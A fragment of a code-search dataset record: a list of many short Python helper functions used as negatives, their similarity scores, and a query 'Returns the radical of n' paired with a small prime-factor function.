'ciento', 'doscientas', 'trescientas', 'cuatrocientas', 'quinientas', 'seiscientas', 'setecientas', 'ochocientas', 'novecientas']\n if n % 100 == 0:\n return centenas[n // 100]\n return f\"{centenas[n // 100]} {numero_a_letras(n % 100)}\"\n elif n < 10**6:\n if n < 2000:\n return f\"mil {numero_a_letras(n % 1000)}\"\n if n % 1000 == 0:\n return f\"{numero_a_letras(n // 1000)} mil\"\n return f\"{numero_a_letras(n // 1000)} mil {numero_a_letras(n % 1000)}\"\n else:\n raise ValueError(\"Numero demasiado grande\")", "def mk_lst_trans_met(self):\n\t\telem_rnge_I = [[21,30],[39,44],[46,48],[74,76],[78,80]]\n\t\telem_rnge=[]\n\t\tfor i in elem_rnge_I:\n\t\t\tel_strt=i[0]\n\t\t\tel_end=i[1]\n\t\t\trnge_sect=range(el_strt,el_end+1)\n\t\t\telem_rnge.extend(rnge_sect)\n\t\telements=[]\n\t\tfor i in elem_rnge:\n\t\t\telement=Element.from_Z(i)\t# Indice -> pymatgen element object\n\t\t\telements.append(element)\n\t\treturn elements", "def pretraga_po_roku_trajanja(self, lst, datum):\n pretrazeno = []\n for i in lst:\n if i.rok_trajanja == datum:\n pretrazeno.append(i)\n return pretrazeno", "def info(self, list: list[int], /) -> list[int]:", "def get_tri_list(top_tri):\n\ttri_nums = [1]\n\tval = 1\n\twhile tri_nums[-1] < top_tri:\n\t\ttri_val = int(.5*(val*(val+1)))\n\t\ttri_nums.append(tri_val)\n\t\tval += 1\n\treturn tri_nums", "def diezmar(arr_grande, arr_chico):\n paso = int(len(arr_grande) / len(arr_chico))\n r = arr_grande[::paso]\n return r", "def question_22(list_num: float) -> float:\n list_num.sort()\n return list_num[0:3]", "def errs_tab(n):\n return [10**(q / -10) for q in range(n + 1)]", "def rangoli(n):\r\n alphabet = string.ascii_lowercase\r\n pad = 4*n-3\r\n filler = '-'\r\n initial = [alphabet[n-1]]\r\n top = [alphabet[n-1].center(pad, filler)]\r\n\r\n for i in range(n-2, -1, -1):\r\n initial.append(alphabet[i])\r\n sub_list = initial[:-1]+[alphabet[i]]+list(reversed(initial[:-1]))\r\n sub_seq = filler.join(sub_list).center(pad, filler)\r\n top.append(sub_seq)\r\n\r\n bot = list(reversed(top[:-1]))\r\n result = '\\n'.join(top + bot)\r\n print(result)\r\n return", "def simple_nod(number):\n 
nod = 2\n temp_list = []\n while nod ** 2 <= number:\n if not number % nod:\n temp_list.append(nod)\n number //= nod\n else:\n nod += 1\n if number > 1:\n temp_list.append(number)\n return temp_list", "def nom(meal, i1):\n # Iterators\n #numOfIts = len(meal)\n #its = [i1 for i1 in range(0,numOfIts)]\n #its = [0,2,1,6, len(meal)]\n #its = createIts(meal)\n numOfIts = len(its)\n \n newnom = 0\n for i2 in range(0,numOfIts):\n newnom += int(meal[its[i2]+i1]) + primes[i2]\n #print(primes[i2])\n #print(\"newnom =\", newnom)\n \n newnom = str(newnom % 10)\n return newnom", "def backm(self,numero):\n try:\n for x in range(numero):\n self.tiempos.anterior()\n except StopIteration:\n return", "def question_21(list_num: float) -> float:\n list_num.sort(reverse=True)\n return list_num[0:3]" ]
[ "0.6289262", "0.62472546", "0.6225951", "0.61801213", "0.60700405", "0.59977514", "0.5939416", "0.5908262", "0.5887603", "0.585121", "0.5849568", "0.5843982", "0.5811617", "0.57871395", "0.57503945", "0.5743789", "0.57214135", "0.5715634", "0.56780475", "0.56768674", "0.5663247", "0.56263644", "0.56258327", "0.56230813", "0.56213623", "0.5619831", "0.55943686", "0.55861884", "0.55855715", "0.55831647", "0.55790097", "0.5573001", "0.5569425", "0.55675435", "0.5566071", "0.55644476", "0.5560046", "0.55580145", "0.55521", "0.5536439", "0.5529961", "0.5529958", "0.552982", "0.5516577", "0.5512209", "0.55090404", "0.5489616", "0.5469032", "0.5460448", "0.5460192", "0.5460098", "0.54413635", "0.5440813", "0.54378045", "0.5437153", "0.54338235", "0.5420394", "0.5413145", "0.54128844", "0.5410829", "0.5407284", "0.5401289", "0.5401289", "0.53995985", "0.53995633", "0.5396819", "0.5395304", "0.5393529", "0.53898656", "0.5384749", "0.53778625", "0.5376866", "0.53718984", "0.5364748", "0.53640693", "0.53537285", "0.53518456", "0.53504723", "0.5348947", "0.5343388", "0.53382915", "0.53327894", "0.53180593", "0.5316748", "0.53166944", "0.5312521", "0.53099304", "0.5303231", "0.5300756", "0.52967453", "0.52938735", "0.5291439", "0.52900094", "0.5289519", "0.5288808", "0.5288358", "0.5286855", "0.5274454", "0.52744037", "0.52730167", "0.52702004" ]
0.0
-1
Returns the radical of n
def radicale(n):
    r = 1
    for p in primi(n+1):
        if p > n:
            break
        if n % p == 0:
            r *= p
            n = n // p
    return r
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def n_wyraz(a1,nr_wyrazu,r):\n return a1+(nr_wyrazu-1)*r", "def Arn(r, n):\n ret = 1\n for t in range(n, n-r+1-1, -1):\n ret *= t\n return ret", "def _rnm(self, n, m, r):\n r_sum = 0\n m = int(abs(m))\n u = int((n-m)/2)\n v = int((n+m)/2)\n for s in range(0, u+1):\n numerator = pow(-1, s) * math.factorial(int(n-s)) * pow(r, n-2*s)\n try:\n denominator = math.factorial(s) * math.factorial(v-s) * math.factorial(u-s)\n except ValueError:\n raise ValueError('(s,n,m,u,v) = (%d,%d,%d,%d,%d)' % (s, n, m, u, v))\n r_sum += numerator / denominator\n return r_sum", "def radrad(rxn_class):\n return rxn_class[2]", "def rad(x) :#en mm!\r\n return topdia(x)/2.0", "def nCr():\n return math.factorial(self.nn) / (math.factorial(self.rr) * math.factorial(self.nn - self.rr))", "def calculateSNR(self):\n pass", "def _r_at_interface(self, polarization, n_1, n_2):\n if polarization == 's':\n return ((n_1-n_2)/(n_1+n_2))\n elif polarization == 'p':\n return ((n_1-n_2)/(n_1+n_2))\n else:\n raise ValueError(\"Polarization must be 's' or 'p'\")", "def nCWRk(n, r):\n val = 1\n for i in range(1, r+1):\n val *= n + r - i\n val //= i\n return val", "def get_n1(r,N):\n n1 = N - np.sum(r)\n return n1", "def ncr(n, r):\n r = min(r, n-r)\n if r == 0:\n return 1\n if r < 0:\n return 0\n numer = reduce(op.mul, xrange(n, n-r, -1))\n denom = reduce(op.mul, xrange(1, r+1))\n return numer / denom", "def buscarRecorrido(n):\n #se llama la función para generar una matriz de tamaño N x N\n dist = generarMatriz(n)\n #empezamos con la ciudad 0\n primCiudad = 0\n\n arbol = ArbolNario(primCiudad,n)\n nodo = arbol.getRaiz()\n\n startTime = timeit.default_timer()#Comienzo del algoritmo Hill-Climbing\n while(nodo.getHijos().size > 0):\n hijos = nodo.getHijos()\n nodo = encontrarMejor(nodo.getId(), hijos, dist) \n exeTime = round((timeit.default_timer() - startTime)*SEC_A_MICRO,1)\n return obtenerRecorrido(nodo, dist), exeTime", "def n(self):\n pass", "def Crn(r, n):\n ret = 1\n if(r>n/2):\n return Crn(n-r, n)\n for t in range(n, n-r+1-1, -1):\n ret *= t\n return ret/fact(r)", "def update_RL(self, n):\n newR = self._mps_RL(self.R[n], self.A[n], self.A[n])\n if n == self.L - 1:\n self.R[self.L + 1] = newR.flat[0]\n else:\n self.R[n + 1] = newR", "def nr():\n pass", "def factR(n):\n if n == 1:\n return n\n return n*factR(n-1)", "def rof(number):\n\n return round(number * 2) / 2", "def getR(self):\n # Reynolds number uses the absolute value of the velocity\n V = abs(self.V)\n return (V * self.D) / self.v # formula for Reynolds number", "def ComputeNrb(self):\r\n pass", "def n_suma(a1,nr_wyrazu,r):\n return (2*a1+(nr_wyrazu-1))*nr_wyrazu/2", "def _n_ball_rad(n, vol):\n unitvol = _n_ball_vol(n, 1)\n radius = (vol / unitvol) ** (1.0 / n)\n return radius", "def item_tres(n):\n if n <= 0.167:\n return 0\n elif n > 0.167 and n <= 0.333:\n return 1\n elif n > 0.333 and n <= 0.500:\n return 2\n elif n > 0.500 and n <= 0.667:\n return 3\n elif n > 0.667 and n <= 0.834:\n return 4\n elif n > 0.834 and n <= 1.000:\n return 5", "def _irep_to_value(self,n,i):\n if i == 1:\n j,k = divmod(n,9)\n v = (k+1)*10**j\n return v\n else:\n j,k = divmod(n,int(10.0/i))\n if k == 0:\n v = 10**j\n else:\n v = i*k*10**j\n return v", "def fact_r(n):\n \n if n == 1:\n return n\n \n return n * fact_r(n-1)", "def reciprocal(self):\n return Rational(self.denominator, self.numerator)", "def ne(n):\n return 4*n*n - 2*n + 1", "def toRadString(self):\r\n pass", "def nw(n):\n return 4*n*n + 1", "def Get_direction(n):\n if abs(n) == 0:\n return 0\n else:\n return n / abs(n)", 
"def update_RR(self, n):\n newR = self._mps_RR(self.R[n + 1], self.A[n], self.A[n])\n if n == 0:\n self.R[self.L + 1] = newR.flat[0]\n else:\n self.R[n] = newR", "def I (self, n):", "def mirror(n):\n return (n % 10)*10 + (n // 10)", "def zernike_rad(m, n, rho):\n if (n < 0 or m < 0 or abs(m) > n):\n raise ValueError\n if ((n-m) % 2):\n return rho*0.0\n pre_fac = lambda k: (-1.0)**k * fac(n-k) / ( fac(k) * fac( (n+m)/2.0 - k ) * fac( (n-m)/2.0 - k ) )\n return sum(pre_fac(k) * rho**(n-2.0*k) for k in xrange((n-m)/2+1))", "def _mass_radius_relation(R, A, n):\n\n M = A * (R ** ((3 - n) / (1 - n)))\n return M", "def wr(nr):\n return (1 - nr) if nr < 1.0 else 0.0", "def octagonal(n: int) -> int:\n return int(n * (3 * n - 2))", "def cuadrado(n):\n cuadrado=n**2\n print n, \"al cuadrado es\", cuadrado\n return cuadrado", "def ndcg_at_k(self, r, k, method=0):\n # print(\"sorted:\" + str(sorted(r, reverse=True)))\n # 排完序最理想的結果分數\n dcg_max = self.dcg_at_k(sorted(r, reverse=True), k, method)\n # print(\"dcg_max:\" + str(dcg_max))\n if not dcg_max:\n return 0.\n return self.dcg_at_k(r, k, method) / dcg_max", "def reprographie():\n nombreDePhotocopie = int(input(\"Entrez le nombre de photocopie a effectuer \"))\n PREMIER_PRIX = 0.10\n DEUXIEME_PRIX = 0.09\n TROISIEME_PRIX = 0.08\n PREMIERE_TRANCHE = 10\n DEUXIEME_TRANCHE = 20\n TROISIEME_TRANCHE = 30\n resultat = 0\n if(nombreDePhotocopie>TROISIEME_TRANCHE):\n resultat = DEUXIEME_TRANCHE*DEUXIEME_PRIX+1+(nombreDePhotocopie-30)*TROISIEME_PRIX\n elif(nombreDePhotocopie<=TROISIEME_TRANCHE):\n if(nombreDePhotocopie/10>1):\n resultat = (nombreDePhotocopie-10)*DEUXIEME_PRIX+(PREMIERE_TRANCHE*PREMIER_PRIX)\n else:\n resultat = nombreDePhotocopie*PREMIER_PRIX\n return resultat", "def stirling(n):\n return n**n*isqrt(2*math.pi*n)/math.e**n", "def get_rm(g):\n return 1 / g", "def calc_ri(n2,bx,f):\n\n Ri = (f**2*n2)/np.abs(bx)**2\n modRi = np.arctan(-Ri**-1)\n return Ri, modRi", "def list_to_nine(n):\n if n < 10:\n print(n)\n else: \n print(n, end=\", \")\n n = abs(n - mirror(n))\n list_to_nine(n)", "def nonlinear_refractive_index(name):\n if name == 'Ne':\n return 8e-9 # cm^2/TW\n elif name == 'He':\n return 3e-9\n elif name == 'Ar':\n return 1e-7\n else:\n raise ValueError('Unknown substance %s' % name)", "def n():\n # For documentation purposes", "def getRadix(self, settings: ghidra.docking.settings.Settings) -> int:\n ...", "def n_choose_r(n, r):\n if r == 1:\n return n\n elif r == n:\n return 1\n elif r == 0 or n == 0:\n return 0\n else:\n return n_choose_r(n-1, r-1) + n_choose_r(n-1, r)", "def rotate_RT_NE(n, e, ba):\n ba = 360.0 - ba\n return rotate_NE_RT(n, e, ba)", "def J (self, n):", "def triangular_number(n):\n return n*(n+1) / 2", "def silnia_it(n):\n wynik = 1\n \n for i in range(1, n + 1):\n wynik = wynik * i\n return wynik", "def get_tribonnaci(self, n):\n if n not in self.numbers:\n current_n = max(self.numbers)\n while current_n < n:\n current_n += 1\n self.numbers[current_n] = self.numbers[current_n - 1] + \\\n self.numbers[current_n - 2] + \\\n self.numbers[current_n - 3]\n return self.numbers[n]", "def nze(self) -> int:", "def nze(self) -> int:", "def net_r(self):\r\n try: q = 0 if self.ref.q is None else self.ref.q\r\n except: q = 0\r\n\r\n frf_r = 0 if self.frf_r is None else self.frf_r\r\n rf_r = 0 if self.rf_r is None else self.rf_r\r\n\r\n return rf_r - q - frf_r # calculate RFR net of yield and foreign RFR\r", "def refract(ki,n,mi,mt):\n ki,n,mi,mt = map(np.asarray, (ki,n,mi,mt))\n return Fresnel._refract(ki,n,mi,mt)", "def 
inner_rad(self) -> Quantity:\n return self._inner_rad", "def fun_lorentzian(p,r):\n return p[1] / ((r/p[0])**2 + 1)", "def TNR(self):\n return _div(self.TN, self.FP + self.TN)", "def __rshift__(self, n: int) -> 'SInt':\r\n if type(n) != int or n < 0:\r\n raise TypeError(\"Wrong type for n : positive integer needed\")\r\n n = min(n, len(self) - 1)\r\n S = SInt(self.nbBytes)\r\n S.binaire = self.signe + '0' * n + self.binaire[1:-n]\r\n return S", "def dirac(self,n):\r\n y = np.zeros(len(n),dtype = complex)\r\n y[n==0] = 1\r\n return y", "def _rawprng(self):\n self.p += 1 \n if self.p >= self.o:\n\t\t\tself.p = 0\n t = 1768863 * self.s[self.p] + self.c * 2.3283064365386963e-10\n self.c = int(t) | 0\n self.s[self.p] = t - self.c\n return self.s[self.p]", "def __make_numerator_integer(self):\n while self.numerator % 1 !=0:\n self.denominator *=10\n self.numerator *=10", "def radius_to_annulus(r,annuli):\n if r < R_in:\n return -1\n for annulus in range(len(annuli)):\n if annuli[annulus] == r:\n annulus_smaller = annulus\n return annulus_smaller \n if annuli[annulus] > r:\n annulus_smaller = annulus-1\n return annulus_smaller\n return len(annuli)-1", "def arc_n(self, xn ,yn, rn, start, stop):\n x = round(xn * self.width)\n y = round(yn * self.height)\n r = round(rn * min(self.width, self.height))\n self.arc(x, y, r, start, stop)", "def rastrigin(x):\n x = np.copy(x)\n x -= 10.0\n if not np.isscalar(x[0]):\n N = len(x[0])\n min_num = np.array([10 * N + sum(xi**2 - 10 * np.cos(2 * np.pi * xi)) for xi in x])\n return min_num * (-1)\n N = len(x)\n return -(10 * N + sum(x**2 - 10 * np.cos(2 * np.pi * x)))", "def __make_denominator_integer(self):\n while self.denominator % 1 !=0:\n self.denominator *=10\n self.numerator *=10", "def rangoli(n):\r\n alphabet = string.ascii_lowercase\r\n pad = 4*n-3\r\n filler = '-'\r\n initial = [alphabet[n-1]]\r\n top = [alphabet[n-1].center(pad, filler)]\r\n\r\n for i in range(n-2, -1, -1):\r\n initial.append(alphabet[i])\r\n sub_list = initial[:-1]+[alphabet[i]]+list(reversed(initial[:-1]))\r\n sub_seq = filler.join(sub_list).center(pad, filler)\r\n top.append(sub_seq)\r\n\r\n bot = list(reversed(top[:-1]))\r\n result = '\\n'.join(top + bot)\r\n print(result)\r\n return", "def nx(self, n: int) -> float:\n result = self._read_inline(f\"nx({n})\")\n return result", "def rstar(v10, n, L4, c10=0.0):\n return 2.21*np.sqrt(L4/(n*(v10**2 + c10**2)))", "def do_dr(r, t):\n return 1/t**0.5", "def make_agree_vis_nir(self,rad):\n print( 'Ratio-ing the NIR spectra to match VIS *** Only for 4STAR ***')\n ivis = range(1055,1069)\n inir = range(1004,1037)\n mean_vis = np.nanmean(mea['rad'][600,ivis])\n mean_nir = np.nanmean(mea['rad'][600,inir])\n s_ratio_vis_nir = mean_vis/mean_nir", "def combination(n, r):\n\n \n\n \n numerator = factorial(n)\n denominator = factorial(r)\n subtracted_answer = factorial(n-r)\n \n\n answer = numerator/(denominator * subtracted_answer)\n print(answer)\n return answer", "def rastrigin(indiv):\n n = len(indiv)\n A = 10\n return A * n + sum([x**2 - A * math.cos(2 * math.pi * x) for x in indiv])", "def uz(self, n: int) -> float:\n result = self._read_inline(f\"uz({n})\")\n return result", "def n(self):\n raise NotImplementedError", "def __rdiv__(self, number):\n return self.__div__(number)", "def __neg__(self):\r\n\t\t\r\n\t\t# take negative\r\n\t\tn = self.scale(-1)\r\n\t\t\r\n\t\treturn n", "def R(self):\n\t\treturn (arange(self.rbins) + 0.5) * (self.cbins - 0.5) / self.rbins", "def polygonal_number(s, n):\n return (n*n*(s-2)-n*(s-4))/2", "def 
formula_n(self, n: int, x: np.ndarray) -> np.ndarray:\n\n # express x as z = x/(x-1)\n z = x / (x - 1)\n\n # special case @n=0\n if n == 0:\n kn = 1 - self._vlerchphi(1 / z, n + 1)\n else:\n kn = 1 / n - self._vzlerchphi(1 / z, n + 1)\n\n # return\n return kn", "def g(n):\n\t\"*** YOUR CODE HERE ***\"\n\tif n <= 3:\n\t\treturn n\n\telse:\n\t\treturn g(n-1) + 2*g(n-2) + 3*g(n-3)", "def NUT1(self,NUT1b,n=2.0):\n if self.tipo == 'contra':\n return n*NUT1b\n if self.tipo == 'paralelo':\n return n*NUT1b\n if self.tipo == 'misto':\n return n*NUT1b", "def reciprocal(self):\r\n s, e = self.share\r\n s = 0.5*(1/s) # TODO: no normalization for 1/s as 1/2<=abs(s)<=1 (s<0 test still needed)\r\n return type(self)((s, 1-e))", "def snr(p1, l1x, l1y, p2, l2x, l2y, var):\n ip12 = inner_product(p1, l1x, l1y, p2, l2x, l2y, var)\n ip11 = inner_product(p1, l1x, l1y, p1, l1x, l1y, var)\n ip22 = inner_product(p2, l2x, l2y, p2, l2x, l2y, var)\n\n return ip11 / (ip11 + ip22 - 2 * ip12)", "def silverman(n: int, ess: float) -> float:\n\n return (ess * (n + 2) / 4) ** (-1 / (n + 4))", "def radialInner(self):\n if self.radial in range(1, len(self.ThRZmesh.getPositions(label=\"R\"))):\n R = self.ThRZmesh.getUpper(label=\"R\", n=(self.radial - 1))\n else:\n runLog.warning(\n \"Error: Radial Index ({0}) location not INSIDE mesh \".format(\n self.radial\n )\n )\n runLog.warning(self.ThRZmesh.getPositions(label=\"R\"))\n R = None\n return R", "def ny(self, n: int) -> float:\n result = self._read_inline(f\"ny({n})\")\n return result", "def pentagon(n) -> int:\n\n return (n * (3 * n - 1)) // 2", "def __R1(x: float) -> np.float64:\n if np.abs(x) < end:\n return np.float64((1 / np.pi) * np.sqrt(2 * N - x * x))\n return np.float64(0.0)", "def rellena(self):\r\n for nodo in range(0, self.red['n']):\r\n for i in range(0, self.red.conec[nodo]):\r\n if self.red.conex[nodo][i] > nodo:\r\n ilink = self.S[int(nodo)] + self.S[int(self.red.conex[nodo][i])]\r\n ilink = ''.join(sorted(ilink))\r\n self.links[ilink][0] += 1", "def __init__(self, n: int):\n\n self.root = [-1] * n", "def z_r(b):\n return b/1e-2 + 0.5", "def calc_soma(n):\n \n # Comecamos por percorrer os caracteres de n, e juntamos a cada caracter o que estava à sua direira, do lado esquerdo, invertendo o numero. Caso um dos caracteres nao seja um algarismo, chamamos a atencao ao utilizador para o erro.\n # Seguidamente, percorremos a cadeia recem criada. OS caracteres nas posicoes impares da cadeia anterior (indices 0,2,4,..) vao ser multiplicados por 2. Se a multiplicacao der um resultado superior a 9, subtrai-se 9. 
Os caracteres nas posicoes pares vao para a nova cadeia sem qualquer alteracao.\n # Finalmente percorremos os elementos da cadeia e somamos, convertidos a inteiros.\n \n \n comp = len(n)\n num_invertido , num_invertido2 = '' , ''\n soma_luhn = 0\n \n for e in n:\n \n if '0' <= e <= '9': \n num_invertido = e + num_invertido\n \n else:\n raise ValueError ('function calc_soma(): O string recebido apenas pode conter digitos')\n \n \n for i in range(comp):\n \n if i%2 == 0:\n resultado = eval(num_invertido[i]) * 2\n \n if resultado > 9:\n num_invertido2 = num_invertido2 + str(resultado - 9)\n \n else:\n num_invertido2 = num_invertido2 + str(resultado)\n \n else:\n num_invertido2 = num_invertido2 + (num_invertido[i])\n \n\n for e in num_invertido2:\n soma_luhn = soma_luhn + eval(e)\n \n return soma_luhn", "def g(n):\n \"*** YOUR CODE HERE ***\"\n if n < 4:\n return n\n else:\n return g(n-1) + 2*g(n-2) + 3*g(n-3)", "def isqrt(n): # newton (from stackoverflow)\n if n < 0:\n print(f\"segur que vols fer l'arrel de {n}?\")\n n = -n\n x = n\n y = (x + 1) // 2\n while y < x:\n x = y\n y = (x + n // x) // 2\n return x", "def get_radius(self):", "def estimularRN(rn,matriz):\n if matriz == None:\n return None\n else:\n return rn.activate(matriz)", "def nsucc(self, a):\n n, absucc = self.control[a.name]\n if self.world.round == n: return 0.0\n else: return float(a.success - absucc) / float(self.world.round - n)" ]
[ "0.6703785", "0.65736157", "0.6541312", "0.6525386", "0.6515335", "0.63054556", "0.6147716", "0.61371934", "0.61207694", "0.6074879", "0.60558325", "0.605559", "0.6001547", "0.59967726", "0.5936649", "0.5906539", "0.58998317", "0.5871071", "0.58641", "0.5848409", "0.58474976", "0.5843289", "0.5839744", "0.58339447", "0.5823272", "0.5820578", "0.5820448", "0.58011466", "0.5767946", "0.5758748", "0.5744038", "0.5725037", "0.57211614", "0.57135856", "0.5711033", "0.5702549", "0.5701677", "0.5701239", "0.5680635", "0.5672732", "0.5670052", "0.5669921", "0.5666063", "0.5633344", "0.56330574", "0.56125164", "0.56029373", "0.5596752", "0.5589488", "0.5589168", "0.55887896", "0.5586389", "0.5572834", "0.55580765", "0.55580765", "0.5546349", "0.5512525", "0.5509644", "0.5504229", "0.550409", "0.55018115", "0.5493197", "0.5481229", "0.54798305", "0.54776746", "0.54775333", "0.5460869", "0.54524857", "0.5449226", "0.5446364", "0.5445703", "0.5441641", "0.54310954", "0.5430057", "0.5424709", "0.54210097", "0.5411157", "0.540689", "0.5405978", "0.5405043", "0.5391351", "0.53796417", "0.53795016", "0.5378202", "0.5373829", "0.5364852", "0.53583246", "0.53571844", "0.53552765", "0.53486925", "0.53475446", "0.53414816", "0.53412133", "0.53410673", "0.53400016", "0.53396815", "0.5337552", "0.5337266", "0.5336227", "0.53350073" ]
0.68493146
0
Returns the next element in the Collatz sequence
def collatz(n):
    # One Collatz step: halve an even n, send an odd n to 3n + 1.
    if n % 2 == 0:
        return n // 2  # floor division keeps the result an integer in Python 3
    else:
        return 3 * n + 1
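A short driver makes the step function above concrete; the wrapper below is an illustrative sketch added by the editor, not part of the dataset record:

def collatz_sequence(n):
    # Apply the single-step rule until the sequence reaches 1.
    seq = [n]
    while n != 1:
        n = collatz(n)
        seq.append(n)
    return seq

print(collatz_sequence(6))  # [6, 3, 10, 5, 16, 8, 4, 2, 1]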
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def busca_sequencial_sentinela(lista, elemento):\n contador = 0\n lista.append(contador) \n try: \n while lista[contador] != elemento:\n contador += 1\n if contador == len(lista) - 1:\n del lista[-1]\n return -1\n \n del lista[-1]\n return contador\n except IndexError:\n print('Elemento nao achado')", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def enchere(self):\n\n i = 0\n while i < 5 and self.annonce < 4:\n paroleJ = self.joueurs[i].parler(self.annonce)\n if paroleJ != 0:\n self.annonce = paroleJ\n self.indiceJoueurQuiPrend = i\n i += 1\n\n print(\"joueur qui prend : \" + str(self.indiceJoueurQuiPrend))\n if self.indiceJoueurQuiPrend != -1:\n print(\"annonce : \" + str(self.annonce))\n if self.annonce == 1 or self.annonce == 2:\n self.joueurs[self.indiceJoueurQuiPrend].possedeChien = True\n self.joueurs[self.indiceJoueurQuiPrend].construireChien()\n self.debuterPartie()\n\n else:\n self.finirPartie()", "def back(self):\n try:\n self.tiempos.anterior()\n except StopIteration:\n return", "def esta_al_final(self):\n\t\treturn self.posicion == (len(self.lista) - 1)", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def step(self):\n try:\n self.tiempos.siguiente()\n except StopIteration:\n return", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def mostrarBicicletasDisponiveis(self) -> int:\n estoque_atual = Loja().mostrarEstoque()\n print(f'Bicicletas disponíveis: {estoque_atual}')\n return estoque_atual", "def custo(EstadoRestaUm, resultante):\n return 1", "def rellenar_atril(self):\n while self.get_atril_espaciosVacios() > 0 and self.bolsa.cantidad_Fichas() > 0:\n self.agregar_al_atril()", "def bloqueio_de_bifurcacao_4(tab,jog): \r\n if len(bifurcacao_3(tab,-1*jog)) == 1 :\r\n return bifurcacao_3(tab,-1*jog)[0]\r\n else:\r\n for i in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1:\r\n col = obter_coluna(tab,i)\r\n for j in range(3):\r\n if col[j]==0:\r\n pos1=3*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if obter_linha(tab,i).count(jog)==1:\r\n linha = obter_linha(tab,i)\r\n for j in range(3):\r\n if linha[j]==0:\r\n pos1=j+1+3*(i-1)\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if i < 3 and obter_diagonal(tab,i).count(jog)==1:\r\n diagonal = obter_diagonal(tab,i)\r\n for j in range(3):\r\n if i==1:\r\n if diagonal[j]==0:\r\n pos1=4*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n else:\r\n if diagonal[j]==0:\r\n pos1=7-2*j\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n 
print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def successeurs(self,etat):\n pass", "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def modification_de_couleur(var,y):\n for i in range(len(Couleurs)): #Permet de savoir à quel valeur\n if L[i] == var: #de la liste la personne est en\n break #arrivant.\n while True:\n rectangle(410,y,437,y+17,'black','#A9A9A9')\n rectangle(410,y+23,437,y+40,'black','#A9A9A9')\n fleche(424,y+20,424,y+5,'black',2)\n fleche(424,y+30,424,y+35,'black',2)\n x2,y2,z2=attente_clic()\n if 410<=x2<=437:\n if y<=y2<=y+17:\n i += 1\n elif y+23<=y2<=y+40:\n i -=1\n else:\n return Couleurs[i],Couleurs2[i]\n if i >= 12:\n i = 0\n if i < 0:\n i = 11\n cercle(100,120,10,Couleurs[i],Couleurs2[i])\n cercle(120,120,10,Couleurs[i],Couleurs2[i])\n cercle(140,120,10,Couleurs[i],Couleurs2[i])", "def otra_partida():\r\n\r\n for jugador_1 in juego.get_jugadores():\r\n\r\n \"\"\"Va Iterando sobre todos los jugadores disponibles de uno en uno\"\"\"\r\n color.utilizarVerde()\r\n print(\"\\nEmpieza: {}\".format(jugador_1.get_jugado_nombre()))\r\n num1, num2 = juego.get_rangos()\r\n print(\"Rango de {} al {}\".format(num1, num2))\r\n jugador_1.set_jugador_intentos(4)\r\n intentos = jugador_1.get_jugador_intentos()\r\n numero_oculto = randint(num1, num2)\r\n puntos = jugador_1.get_jugador_puntuacion_total()\r\n\r\n while intentos >= 0:\r\n\r\n \"\"\"Empieza la partida con 4 Intentos hasta que se quede en 0\"\"\"\r\n\r\n try:\r\n color.utilizarVerde()\r\n numero = int(input(\"\\nIntroduce un Número: \"))\r\n color.utilizarAmarillo()\r\n print(\"Intetos Restantes: {}\".format(intentos - 1))\r\n if numero_oculto < numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Grande\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero_oculto > numero and intentos != 1:\r\n color.utilizarRojoClarito()\r\n print(\"\\nEs Demasiado Pequeño\\n\")\r\n intentos -= 1\r\n jugador_1.set_jugador_intentos(intentos)\r\n\r\n elif numero == numero_oculto:\r\n color.utilizarAzul()\r\n print(\"\\nHas Ganado en el {0} intento\".format(intentos))\r\n puntos += 1\r\n jugador_1.set_jugador_puntuacion_total(puntos)\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n elif numero != numero_oculto and intentos == 1:\r\n color.utilizarVerdeClarito()\r\n print(\"\\nEl número era {} :(\\n\".format(numero_oculto))\r\n color.utilizarRojo()\r\n print(format(\"GAME OVER\", \"-^75\"))\r\n input(\"Pulse enter para continuar...\")\r\n break\r\n\r\n except (ValueError, NameError):\r\n print(\"\\nError: Tiene que ser un número ...\")", "def mezclar_bolsa(self):", "def 